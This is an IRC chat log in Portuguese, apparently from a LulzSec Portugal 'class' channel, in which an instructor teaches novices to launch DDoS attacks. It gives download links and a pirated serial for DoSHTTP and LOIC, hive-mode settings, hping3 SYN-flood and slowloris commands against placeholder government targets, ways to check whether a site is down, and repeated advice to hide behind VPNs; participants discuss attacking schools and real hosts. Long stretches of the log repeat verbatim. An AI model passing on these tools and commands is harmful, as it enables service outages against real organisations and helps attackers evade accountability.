- <c0ldc0d3r> http://ha.ckers.org/slowloris/slowloris.pl
- <sc0rp> bem era esse que me estava a referir
- <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
- <Made> não é mandar, a firewall é que não deixa fazer c0ldc0der
- <sc0rp> e nao o loic
- <c0ldc0d3r> depois é só fazer perl slowloris.pl -dns www.vitima.com -timeout 5
- <tuga> <~c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt |||| nao percebi esta parte :S
- <sc0rp> peço desculpa
- <c0ldc0d3r> tuga, essa parte é só para quem usar linux
- <c0ldc0d3r> usas linux?
- <tuga> ah ok
- <tuga> w vista
- <c0ldc0d3r> emt
- <tuga> nop
- <c0ldc0d3r> então fica-te pelo loic & DoSHTTP 2.5.1
- <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
- <tuga> sim, o loic ja fiz a cena de conectar, deu-me um IP, o dosHTTP também já registei o serial, mas agora o que faço?
- <c0ldc0d3r> emptydev, servidores disponíveis como assim? os da vítima?
- <emptydev> Yup.. DNS's...
- <Marmelo> Pergunta MUITO importante : Portanto para não saberem o nosso IP verdadeiro , ao usar algum desses programas teremos que usar um vpn ?
- * sh4d0wf40 (other@AN-uui.9t0.s1ct8s.IP) entrou em #aula
- <c0ldc0d3r> para verificar se o ataque está a causar impacto, é ir ao ping.eu/port-chk/ e colocar o site e a porta 80
- * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
- <c0ldc0d3r> Marmelo, sim, sempre ajuda mais usar vpn
- * Grep (Grep@AN-t3n.nat.sh4ali.IP) entrou em #aula
- <sc0rp> bem
- <emptydev> c0ldc0d3r, esse site não verifica só se a porta 80 está aberta?
- <c0ldc0d3r> sim, que é a porta do site.
- <tuga> dúvida: nós é que escolhemos um site qualquer para fazer o que estámos a fazer agora?
- <Marmelo> Pergunta : No loic existe algumas opçoes de ataque , que nao me lembro , penso que era HTTP , ...
- <c0ldc0d3r> o resto pouco interessa.
- <Marmelo> qual a melhor dessas
- <sc0rp> fiz um pequeno video de uma ferramenta de synflood, contudo nao derrubei nenhum site de proposito
- <c0ldc0d3r> tuga, sim.
- * neopunk (neopunk@AN-edd.acp.kbtmgr.IP) entrou em #aula
- <c0ldc0d3r> Marmelo, sim, há o http, tcp e o udp
- <sc0rp> penso que nao faz mal nenhum verem como se procede um attack
- <sc0rp> http://videobam.com/nDOqA
- <Marmelo> qual deles sera o melhor?
- <c0ldc0d3r> o tcp e o http..
- <c0ldc0d3r> porém, se for muita gente, o udp é muito bom.. pois causa impacto na rede toda..
- * Desligou (Ligação terminada no destino).
- FiSH: Chat in #aula will NOT be encrypted (no key found)
- * A conversar em #aula
- * ChanServ coloca o modo +q #aula c0ldc0d3r
- * ChanServ coloca o modo de operador a c0ldc0d3r
- <c0ldc0d3r> peço desculpa
- <c0ldc0d3r> tive um problema na rede
- <tuga> nao tou a perceber nada disto lol xD
- <Marmelo> np
- <sc0rp> é um pouco mais simplificado mas nao tem tantas opções
- <tuga> na boa
- * poptrolha (webchat@AN-j3o.6q6.l7icd1.IP) entrou em #aula
- <c0ldc0d3r> tuga, fizeste download das ferramentas?
- <sc0rp> wireshark
- <sc0rp> *
- * Caravela|Lulz (boh@caravela.lulz.pt) entrou em #aula
- * ChanServ coloca o modo +q #aula Caravela|Lulz
- * ChanServ coloca o modo de operador a Caravela|Lulz
- <Marmelo> ah ok entao o wireshark fica mais simples ne?
- <tuga> sim
- <sc0rp> estava a mudar o portatil de sitio
- <Made> DDos? :D
- <sc0rp> no
- <Marmelo> ok entao
- <AntiSecPT278> no wireshark tens filtros
- * PATRAOjhN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
- <sc0rp> é mais simples para quem entende o trafico e muito melhor para iniciantes, mas o etherape e muito mai facil de usar contudo a informação recebida do servidor nao e a mais detalhada
- <sh4d0wf40> pessoal peço desculpa incomudar..mas na outra sala está lá pessoal que queria assistir as aulas mas não dá para falar e avisar o pessoal..só o caravela é que é op
- * Caravela|Lulz coloca o modo +m #aula
- * ruicruz (ruicruz@AN-tic.j0n.g9g7iv.IP) entrou em #aula
- <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
- <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
- <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
- * AntiSecPT407 (webchat@AN-2ha.off.6qn8qq.IP) entrou em #aula
- <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
- * aula754 (558a3c21@AN-trk.ahu.7j6nol.IP) entrou em #aula
- * unkn0wn (unkn0wn@AN-g1c.sni.4imr8a.IP) entrou em #aula
- <c0ldc0d3r> para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
- <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
- <Marmelo> Relembro que usem vpn enquanto fazem isto!
- <c0ldc0d3r> Caravela|Lulz, vai colocando isso no pastebin que não estou para repetir mais vezes
- <c0ldc0d3r> Caravela|Lulz, colocas-te +m e agora as dúvidas lol?
- <Caravela|Lulz> duvidas façam em pvt
- <Caravela|Lulz> depois fazes copy paste aqui e respondes
- <Caravela|Lulz> para nao haver spam
- * kaos (webchat@AN-c5d.qud.arjsab.IP) entrou em #aula
- <c0ldc0d3r> pois, mas eu tenho o xchat cheio de redes e não dá-me jeito nenhum
- <Marmelo> caravela estava a ir bem
- <Caravela|Lulz> ok
- * Caravela|Lulz coloca o modo -m #aula
- <Marmelo> ok alguma pergunta?
- * c0ldc0d3r coloca o modo de operador a mitsai
- * c0ldc0d3r oferece voz a mitsai
- <Marmelo> Relembro que quem fizer spam leva ban imediato
- * jgut (529ab6c4@AN-trk.ahu.7j6nol.IP) entrou em #aula
- <tuga> sim
- <Caravela|Lulz> faz me um copy paste do log até agora para eu depois guardar em pastebin
- <c0ldc0d3r> paste onde?
- <tuga> coldcoder, já diz tudo até tu onde disses-te, e agora?
- <c0ldc0d3r> piratepad?
- <jgut> nights a tds
- <c0ldc0d3r> tuga, agora é guardar tudo e amanhã colocarás em ação.
- * PATRAOjhN agora chama-se afk_johnnyPATRAODANET
- <Marmelo> lol ja acabou a aula?
- <sc0rp> lol
- * Hikas (5998a3a5@AN-k5k.v7s.hin4td.IP) entrou em #aula
- * jpir (webchat@AN-he6.c2p.6om10t.IP) entrou em #aula
- <c0ldc0d3r> Marmelo, não há muito à dizer..
- <Marmelo> pois nao lol
- * jgut saiu (Quit: http://www.mibbit.com ajax IRC Client)
- <tuga> amanha? mas escolho um site que eu quiser? tenho de começar a fazer o ataque hoje e deixar a noite toda o pc ligado?
- * Kondoriano (marco@AN-6rp.b7j.od2i7s.IP) entrou em #aula
- <c0ldc0d3r> agora é saber se o pessoal entendou..
- * MaP05 (MaP05@AN-qbn.nlh.vg3fe8.IP) entrou em #aula
- <c0ldc0d3r> já vi que alguém conectou o loic ao hive..
- <c0ldc0d3r> 2 pessoas
- <trolololguy_> uma pergunta
- <Made> c0ldc0der tens é de fazer ai uma auma de sqli
- <AntiSecPT278> O tuga está com fé de ir dentro
- * anarchy (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
- <Made> *uma
- <Grep> c0ldc0d3r, para linux o LOIC é igual?
- <trolololguy_> disseste anteriormente q udp era mais eficaz
- <trolololguy_> podes dizer pq?
- <Marmelo> LOIC nao da no linux
- <trolololguy_> sr professor?
- <c0ldc0d3r> Grep, sim
- <c0ldc0d3r> é mais complicado
- <c0ldc0d3r> mas não recomendo loic para linux..
- <c0ldc0d3r> hping3 é mil vezes melhor
- <Kondoriano> já começou?
- <Marmelo> ah my bad pensava que o loic nao dava para o linux
- <mitsai> sim mt melhor
- <Grep> ok isso já tenho ;) como vi a falar de ligar a um irc...
- <Grep> Marmelo, dar dá... com wine :P
- <Marmelo> <trolololguy_> disseste anteriormente q udp era mais eficaz
- * Cereal_Killer (webchat@AN-opo.t9n.1tveis.IP) entrou em #aula
- <c0ldc0d3r> Caravela|Lulz, onde queres que faça paste do log?
- * emptydev- (a@AN-928.r71.7am7ru.IP) entrou em #aula
- <emptydev-> Caravela|Lulz
- <emptydev-> PVT
- * dgrdfg (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
- <emptydev-> http://pastebin.com/TfnBWewg
- <emptydev-> Vejam
- * fx (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
- <c0ldc0d3r> emptydev, boa.
- * beh (boh@AN-us8.nsn.ovi93d.IP) entrou em #aula
- * c0ldc0d3r mudou o tópico para: Aula de hoje resumida: http://pastebin.com/TfnBWewg
- <dgrdfg> estava eu dizendo que deveria haver um sitio pra podermos colocar duvidas e que deviamos elaborar uma faq
- <dgrdfg> visto que as duvidas são mais que muitas
- <c0ldc0d3r> dgrdfg, poderás colocar aqui
- <dgrdfg> e muitas questões são constantemente respondidas
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- <dgrdfg> tipo sempre o msm
- * An0nf40 (other@AN-i37.9oq.2s61dc.IP) entrou em #aula
- <beh> bem pensado
- * inetking saiu (Ping timeout: 121 seconds)
- * fx agora chama-se inetking
- <c0ldc0d3r> podem usar este canal para ajuda..
- <c0ldc0d3r> é na boa..
- <dgrdfg> c0m0 3h k x3 h@k@ u Fb| ?
- * jhNNN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
- <dgrdfg> por exemplo
- <dgrdfg> tenho uma duvida
- * emptydev saiu (Ping timeout: 121 seconds)
- * MaP05 saiu (Ping timeout: 122 seconds)
- * l4m8d4_ (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
- <dgrdfg> porque é que com algumas VPN's n consigo aceder a determinados sites
- * Funho saiu (Ping timeout: 121 seconds)
- <dgrdfg> ou servers
- <dgrdfg> e como evitar que isso aconteça
- * anarchy saiu (Ping timeout: 121 seconds)
- <Grep> c0ldc0d3r, aquele site ping.eu n é melhor o nmap ?
- * dgrdfg agora chama-se anarchy
- <c0ldc0d3r> isso tem haver com o policy que eles têm contra abusos do serviço..
- * AntiSecPT570 (webchat@AN-t76.bhi.3kcki8.IP) entrou em #aula
- <tuga> coldcoder, quanto tiveres tempo, se tiveres tempo e se fizeres o favor de me contactar, por favor contacta-me em pvt, obrigado
- <c0ldc0d3r> tens que usar outra vpn e de preferência fora da europa.
- <Made> amanha há aula?
- <anarchy> pois foi o que eu pensei
- <anarchy> há que pagar :F
- <c0ldc0d3r> Grep, o nmap verifica com o teu ip
- * VenusProject saiu (Ping timeout: 121 seconds)
- <c0ldc0d3r> o ping.eu não.
- <anarchy> mas há vpn's que têm ports fechadas?
- <c0ldc0d3r> tuga, ok
- * ruicruz saiu (Ping timeout: 127 seconds)
- * afk_johnnyPATRAODANET saiu (Ping timeout: 127 seconds)
- * kaos saiu (Quit: Page closed)
- <Grep> Grep, com o proxychains não, pois não? pelo menos pelo que li :S
- * Kondoriano saiu (Ping timeout: 129 seconds)
- * aula754 saiu (Ping timeout: 128 seconds)
- * sc0rp saiu (Ping timeout: 129 seconds)
- <c0ldc0d3r> proxychains poderá resultar...
- <c0ldc0d3r> é uma questão de verificar
- * w4r10ck saiu (Quit: )
- * Hikas saiu (Ping timeout: 132 seconds)
- * Caravela|Lulz saiu (Ping timeout: 125 seconds)
- * l4m8d4 saiu (Ping timeout: 131 seconds)
- * joao_ saiu (Ping timeout: 125 seconds)
- * Marmelo saiu (Ping timeout: 122 seconds)
- * trolololguy_ saiu (Ping timeout: 129 seconds)
- * mitsai saiu (Ping timeout: 125 seconds)
- * sh4d0wf40 saiu (Ping timeout: 157 seconds)
- * l4m8d4_ agora chama-se l4m8d4
- <Grep> tenho feito uns testes, obvio que é mais lento mas tem funcionado... mas é sempre bom haver outras soluções ;) já aprendi kk koisa
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
- <emptydev-> Tinhamos ido para a quakenet, tinhamos + gente, e ninguem caia.
- <c0ldc0d3r> emptydev-, link.
- <c0ldc0d3r> que eu dou ao caravela
- <c0ldc0d3r> para por no twitter
- <Grep> só uma questão que eu cheguei a meio da aula...
- <tuga> c0ldc0d3r, é suposto no LOIC, em baixo em attack status aparecer muitas vezes a dizer failed? pq tenho uns 32.000
- <Grep> o hping3 substitui o DoSHTTP e o Loic certo?
- <c0ldc0d3r> é, isso significa que o servidor está deixando de responder.
- <c0ldc0d3r> Grep, sim.
- <An0nf40> tuga tu estás a fazer isso com uma vpn certo?
- <tuga> nao lool
- <An0nf40> ou estás simplesmente a testar sem nada lol
- <c0ldc0d3r> vpn é necessário, visto que somos poucos..
- <tuga> mas tipo
- <c0ldc0d3r> se fosse tipo 2 mil e tal pessoas a colaborar.. era cagativo usar vpn no meio de tantos ips..
- <tuga> eu ponho em perigo outras pessoas?
- <c0ldc0d3r> mas como são poucos :\
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- <aaaamitsai> +v +o
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
- * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- <tuga> mas eu nao testei num site do governo
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
- * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
- <An0nf40> não precisa ser do governo lol
- <mitsai> +v +o pl
- * emptydev- saiu (Ping timeout: 121 seconds)
- <An0nf40> eles dão mais importancia a esses...
- <tuga> sim, mas acho que uma escola eles nao dao importancia o.O xD
- <Grep> lol omg
- * DaGun (webchat@AN-a0h.8na.8e30u1.IP) entrou em #aula
- * An0nf40 agora chama-se sh4d0wf40
- <DaGun> boas, vao por a aula de hoje no pastebin?
- <tuga> ao desligar o ataque no LOIC o site volta imediatamente online certo?
- <DaGun> e que tava com problemas na net e perdi uma parte
- <DaGun> :S
- <sh4d0wf40> lolol
- <DaGun> xD
- <tuga> dagun, ja puseram penso eu
- <Made> DaGun http://pastebin.com/TfnBWewg]
- <DaGun> só?
- <c0ldc0d3r> tuga, sim e não.
- * LzKotha (webchat@AN-dft.gs0.hkmcdf.IP) entrou em #aula
- <c0ldc0d3r> se o impacto for muito grande.. o site poderá ficar off até haver assistência física.
- <DaGun> é que eu isso apanhei xD
- * MovingForward (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
- <tuga> ah ok
- <mitsai> +v +o pls
- <Made> Ao usar uma vpn, a vnp não fica com os meus dados no log?
- * w4r10ck (webchat@AN-ivc.474.m6tpja.IP) entrou em #aula
- * Marmelo (marmelo@lulzsecportugal.com) entrou em #aula
- <Marmelo> boas
- <c0ldc0d3r> boas
- <AntiSecPT278> broas
- <AntiSecPT278> xD
- <Marmelo> c0ld voz me plss?
- <Marmelo> olha que sacrificio
- <Marmelo> estava eu a jogar
- * c0ldc0d3r oferece voz a Marmelo
- <Marmelo> e sai do windows so para vir para aqui
- <Marmelo> tas a ver lol
- * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
- * w4r10ck saiu (Ping timeout: 121 seconds)
- * Dagun (webchat@AN-mif.uvq.rloiam.IP) entrou em #aula
- * inetking (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
- <Dagun> boas
- * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- * MikeZ (webchat@AN-fs7.uas.g29tu8.IP) entrou em #aula
- * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
- * bl4ck (webchat@AN-f49.isc.j12pk9.IP) entrou em #aula
- * w4r10ck (webchat@AN-vv8.k64.45hl4i.IP) entrou em #aula
- * sc0rp (sc0rp@127.0.0.1) entrou em #aula
- * joao_ (joao@AN-j69.rhd.6cqjs0.IP) entrou em #aula
- * AntiSecPT594 (webchat@AN-3rl.a7v.g29tu8.IP) entrou em #aula
- * Made (webchat@AN-q7o.pmt.arjsab.IP) entrou em #aula
- * trolololguy_ (trolololguy__@AN-ter.ilk.h3nreq.IP) entrou em #aula
- * JojO1z (webchat@AN-gc1.4mh.hqmp6l.IP) entrou em #aula
- <c0ldc0d3r> Então pessoal, tudo bem com vocês?
- <Marmelo> c0ld é melhor fazeres +m acho que é isso
- <c0ldc0d3r> hum?
- <Marmelo> eu estou +/-
- <c0ldc0d3r> podes ir jogar lol
- <wokmaster> could be better
- <wokmaster> :)
- <Marmelo> tipo estou a dizer para bloquares o chat daqui a um bocado
- * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
- <c0ldc0d3r> népia
- * emptydev (a@emptydev.google.suck.it) entrou em #aula
- <c0ldc0d3r> senão como vão tirar dúvidas?
- <emptydev> Que cena :o
- <Marmelo> a sim por pvt pah
- <Marmelo> como ontem
- <Marmelo> senao é uma confusao ...
- <c0ldc0d3r> pvt o cr** que não vou estar a responder um a um.
- <Made> o prof tá atrasado 7 min bora bazar xD
- * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
- <Marmelo> lol Made
- <c0ldc0d3r> Made, hahah
- <Made> :D
- <mitsai> é aqui
- <mitsai> +v
- <mitsai> pl
- <c0ldc0d3r> Mais uns 2 minutos e começamos.
- <Marmelo> mas olha tamos tipo a explicar
- <Marmelo> e vai vir um otario a fazer spam
- <c0ldc0d3r> leva ban.
- <Marmelo> se for como ontem 100+ pessoas
- <Marmelo> imagina
- <c0ldc0d3r> não vai ser lol
- <c0ldc0d3r> irc está tudo mamado
- <Marmelo> lol
- <Marmelo> isso é bom entao lol
- <AntiSecPT278> é neste ou no anonnet.org?
- <c0ldc0d3r> é aqui a aula.
- <AntiSecPT278> felizmente
- <AntiSecPT278> o outro está péssimo
- <c0ldc0d3r> ok, vamos dar início.
- <w4r10ck> c0ld é que ta bue pessoal no anonnet
- <AntiSecPT278> deviam actualizar o twitter com o correcto
- <c0ldc0d3r> w4r10ck, tem que ser neste...
- <w4r10ck> yah yah tb acho melhor o outro server ta uma lastima
- * krak-chevaliers saiu (Ping timeout: 121 seconds)
- * tuga (webchat@AN-iuq.ep7.6cqjs0.IP) entrou em #aula
- <c0ldc0d3r> vão ser necessárias 2 ferramentas para os ataques DDoS
- <c0ldc0d3r> para quem usa window$ claro.
- <tuga> a aula já começou á muito? :/
- <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
- <c0ldc0d3r> tuga, acabou de começar.
- <Marmelo> lol ainda nao começou praticamente
- <Marmelo> vamos la
- <Marmelo> Apartir de agora so podem mandar uma mensagem de cada vez e tem que ser uma questao ou algo importante
- <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
- <Marmelo> Pergunta : E o GoodBye?
- <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
- <joao_> e quem tem linux ?
- <c0ldc0d3r> Marmelo, goodbye não é muito seguro.. ele crasha a meio do ataque.
- <c0ldc0d3r> joao_, já digo para quem tem linux.
- * Gunp0wd3rPl0t saiu (Ping timeout: 121 seconds)
- <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
- * l4m8d4 saiu (*.net *.split)
- * wokmaster saiu (*.net *.split)
- <c0ldc0d3r> poderão*
- <c0ldc0d3r> Agora, para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
- * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
- <tuga> pergunta: qual é o site que está a ser vitima entao?
- <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
- <AntiSecPT278> -.-
- <c0ldc0d3r> Caso a rede vá abaixo, mudem de --flood para -i u100
- <c0ldc0d3r> Dúvidas?
- <Marmelo> Sim
- <Marmelo> o que queres dizer com rede ?
- <c0ldc0d3r> a vossa própria "internet"
- <c0ldc0d3r> ou seja, se não conseguirem acessar o google por exemplo, devido ao ataque.
- <Marmelo> ok
- <c0ldc0d3r> para não estar a sob-carregar a rede, mudam de --flood para -i u100
- <c0ldc0d3r> olha depois mete isto tudo no pastebin e dá ao caravela..
- <mitsai> --- www.xxxxxxxxx.rcts.pt hping statistic ---
- <mitsai> 351986 packets transmitted, 0 packets received, 100% packet loss // Este site nao responde aos pedidos de ping.
- <Marmelo> ok ve se me lembras
- <Made> Pergunta: Servidores que usam CloudLinux, e a firewall não deixa fazer mais do que 3 requests por segundo essas ferramentas dão?
- <sc0rp> o loic sim da
- <c0ldc0d3r> Made, humm..
- <sc0rp> pois envia a informaçao dentro de uma unica coneção ao envez de criar multiplas ligaçoes
- <c0ldc0d3r> isso não serve de muito
- * Tsunamy_ (webchat@AN-1ob.9be.j12pk9.IP) entrou em #aula
- <c0ldc0d3r> mandar 3 requests por segundo..
- <c0ldc0d3r> nem faz muito sentido..
- <c0ldc0d3r> porém, poderás usar o slowloris
- * wokmaster (rooting@AN-pqc.tda.sh4ali.IP) entrou em #aula
- <c0ldc0d3r> http://ha.ckers.org/slowloris/slowloris.pl
- <sc0rp> bem era esse que me estava a referir
- <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
- <Made> não é mandar, a firewall é que não deixa fazer c0ldc0der
- <sc0rp> e nao o loic
- <c0ldc0d3r> depois é só fazer perl slowloris.pl -dns www.vitima.com -timeout 5
- <tuga> <~c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt |||| nao percebi esta parte :S
- <sc0rp> peço desculpa
- <c0ldc0d3r> tuga, essa parte é só para quem usar linux
- <c0ldc0d3r> usas linux?
- <tuga> ah ok
- <tuga> w vista
- <c0ldc0d3r> emt
- <tuga> nop
- <c0ldc0d3r> então fica-te pelo loic & DoSHTTP 2.5.1
- <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
- <tuga> sim, o loic ja fiz a cena de conectar, deu-me um IP, o dosHTTP também já registei o serial, mas agora o que faço?
- <c0ldc0d3r> emptydev, servidores disponíveis como assim? os da vítima?
- <emptydev> Yup.. DNS's...
- <Marmelo> Pergunta MUITO importante : Portanto para não saberem o nosso IP verdadeiro , ao usar algum desses programas teremos que usar um vpn ?
- * sh4d0wf40 (other@AN-uui.9t0.s1ct8s.IP) entrou em #aula
- <c0ldc0d3r> para verificar se o ataque está a causar impacto, é ir ao ping.eu/port-chk/ e colocar o site e a porta 80
- * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
- <c0ldc0d3r> Marmelo, sim, sempre ajuda mais usar vpn
- * Grep (Grep@AN-t3n.nat.sh4ali.IP) entrou em #aula
- <sc0rp> bem
- <emptydev> c0ldc0d3r, esse site não verifica só se a porta 80 está aberta?
- <c0ldc0d3r> sim, que é a porta do site.
- <tuga> dúvida: nós é que escolhemos um site qualquer para fazer o que estámos a fazer agora?
- <Marmelo> Pergunta : No loic existe algumas opçoes de ataque , que nao me lembro , penso que era HTTP , ...
- <c0ldc0d3r> o resto pouco interessa.
- <Marmelo> qual a melhor dessas
- <sc0rp> fiz um pequeno video de uma ferramenta de synflood, contudo nao derrubei nenhum site de proposito
- <c0ldc0d3r> tuga, sim.
- * neopunk (neopunk@AN-edd.acp.kbtmgr.IP) entrou em #aula
- <c0ldc0d3r> Marmelo, sim, há o http, tcp e o udp
- <sc0rp> penso que nao faz mal nenhum verem como se procede um attack
- <sc0rp> http://videobam.com/nDOqA
- <Marmelo> qual deles sera o melhor?
- <c0ldc0d3r> o tcp e o http..
- <c0ldc0d3r> porém, se for muita gente, o udp é muito bom.. pois causa impacto na rede toda..
- * Desligou (Ligação terminada no destino).
- FiSH: Chat in #aula will NOT be encrypted (no key found)
- * A conversar em #aula
- * ChanServ coloca o modo +q #aula c0ldc0d3r
- * ChanServ coloca o modo de operador a c0ldc0d3r
- <c0ldc0d3r> peço desculpa
- <c0ldc0d3r> tive um problema na rede
- <tuga> nao tou a perceber nada disto lol xD
- <Marmelo> np
- <sc0rp> é um pouco mais simplificado mas nao tem tantas opções
- <tuga> na boa
- * poptrolha (webchat@AN-j3o.6q6.l7icd1.IP) entrou em #aula
- <c0ldc0d3r> tuga, fizeste download das ferramentas?
- <sc0rp> wireshark
- <sc0rp> *
- * Caravela|Lulz (boh@caravela.lulz.pt) entrou em #aula
- * ChanServ coloca o modo +q #aula Caravela|Lulz
- * ChanServ coloca o modo de operador a Caravela|Lulz
- <Marmelo> ah ok entao o wireshark fica mais simples ne?
- <tuga> sim
- <sc0rp> estava a mudar o portatil de sitio
- <Made> DDos? :D
- <sc0rp> no
- <Marmelo> ok entao
- <AntiSecPT278> no wireshark tens filtros
- * PATRAOjhN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
- <sc0rp> é mais simples para quem entende o trafico e muito melhor para iniciantes, mas o etherape e muito mai facil de usar contudo a informação recebida do servidor nao e a mais detalhada
- <sh4d0wf40> pessoal peço desculpa incomudar..mas na outra sala está lá pessoal que queria assistir as aulas mas não dá para falar e avisar o pessoal..só o caravela é que é op
- * Caravela|Lulz coloca o modo +m #aula
- * ruicruz (ruicruz@AN-tic.j0n.g9g7iv.IP) entrou em #aula
- <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
- <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
- <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
- * AntiSecPT407 (webchat@AN-2ha.off.6qn8qq.IP) entrou em #aula
- <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
- * aula754 (558a3c21@AN-trk.ahu.7j6nol.IP) entrou em #aula
- * unkn0wn (unkn0wn@AN-g1c.sni.4imr8a.IP) entrou em #aula
- <c0ldc0d3r> para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
- <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
- <Marmelo> Relembro que usem vpn enquanto fazem isto!
- <c0ldc0d3r> Caravela|Lulz, vai colocando isso no pastebin que não estou para repetir mais vezes
- <c0ldc0d3r> Caravela|Lulz, colocas-te +m e agora as dúvidas lol?
- <Caravela|Lulz> duvidas façam em pvt
- <Caravela|Lulz> depois fazes copy paste aqui e respondes
- <Caravela|Lulz> para nao haver spam
- * kaos (webchat@AN-c5d.qud.arjsab.IP) entrou em #aula
- <c0ldc0d3r> pois, mas eu tenho o xchat cheio de redes e não dá-me jeito nenhum
- <Marmelo> caravela estava a ir bem
- <Caravela|Lulz> ok
- * Caravela|Lulz coloca o modo -m #aula
- <Marmelo> ok alguma pergunta?
- * c0ldc0d3r coloca o modo de operador a mitsai
- * c0ldc0d3r oferece voz a mitsai
- <Marmelo> Relembro que quem fizer spam leva ban imediato
- * jgut (529ab6c4@AN-trk.ahu.7j6nol.IP) entrou em #aula
- <tuga> sim
- <Caravela|Lulz> faz me um copy paste do log até agora para eu depois guardar em pastebin
- <c0ldc0d3r> paste onde?
- <tuga> coldcoder, já diz tudo até tu onde disses-te, e agora?
- <c0ldc0d3r> piratepad?
- <jgut> nights a tds
- <c0ldc0d3r> tuga, agora é guardar tudo e amanhã colocarás em ação.
- * PATRAOjhN agora chama-se afk_johnnyPATRAODANET
- <Marmelo> lol ja acabou a aula?
- <sc0rp> lol
- * Hikas (5998a3a5@AN-k5k.v7s.hin4td.IP) entrou em #aula
- * jpir (webchat@AN-he6.c2p.6om10t.IP) entrou em #aula
- <c0ldc0d3r> Marmelo, não há muito à dizer..
- <Marmelo> pois nao lol
- * jgut saiu (Quit: http://www.mibbit.com ajax IRC Client)
- <tuga> amanha? mas escolho um site que eu quiser? tenho de começar a fazer o ataque hoje e deixar a noite toda o pc ligado?
- * Kondoriano (marco@AN-6rp.b7j.od2i7s.IP) entrou em #aula
- <c0ldc0d3r> agora é saber se o pessoal entendou..
- * MaP05 (MaP05@AN-qbn.nlh.vg3fe8.IP) entrou em #aula
- <c0ldc0d3r> já vi que alguém conectou o loic ao hive..
- <c0ldc0d3r> 2 pessoas
- <trolololguy_> uma pergunta
- <Made> c0ldc0der tens é de fazer ai uma auma de sqli
- <AntiSecPT278> O tuga está com fé de ir dentro
- * anarchy (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
- <Made> *uma
- <Grep> c0ldc0d3r, para linux o LOIC é igual?
